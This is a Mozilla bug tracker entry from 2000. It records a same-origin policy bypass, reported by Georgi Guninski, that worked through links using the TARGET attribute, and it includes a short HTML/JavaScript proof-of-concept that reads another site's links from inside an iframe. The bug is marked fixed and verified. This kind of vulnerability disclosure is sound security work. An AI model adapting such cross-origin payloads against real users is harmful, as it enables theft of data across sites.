Closed Bug 31648 Opened 24 years ago Closed 24 years ago

links and TARGET vulnerability

Categories

(Core :: Security, defect, P3)

x86
Windows NT
defect

Tracking

()

VERIFIED FIXED

People

(Reporter: norrisboyd, Assigned: norrisboyd)

References

()

Details

(Whiteboard: Fix in hand)

Subject: 
        BUG: links and TARGET vulnerability
   Date: 
        Mon, 13 Mar 2000 16:03:28 +0200
   From: 
        Georgi Guninski <joro@nat.bg>
     To: 
        Norris Boyd <norris@netscape.com>




It is possible to circumvent Same Origin security policy using links and
the TARGET attribute.
The problems are links like <A HREF="hostile" TARGET="victim"> which
modify the location of the current window to hostile when clicked.
The code is:
---------------------------------------------------
Wait until the IFRAME is loaded:
<IFRAME SRC="http://www.yahoo.com"></IFRAME>
<BR>
<A HREF="http://www.yahoo.com" TARGET="a">Click me first</A>
<BR>
<A
HREF="javascript:window.frames[0].alert(window.frames[0].document.links[0].href)
"
TARGET="a">Click me to see the first link from Yahoo</A>
---------------------------------------------------
Status: NEW → ASSIGNED
Target Milestone: M15
Keywords: beta2
Whiteboard: Fix in hand
Fixed.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
Verified fixed.
Status: RESOLVED → VERIFIED
Keywords: nsbeta2
Opening fixed security bugs to the public.
Group: netscapeconfidential?
Flags: testcase+
Flags: in-testsuite+ → in-testsuite?
You need to log in before you can comment on or make changes to this bug.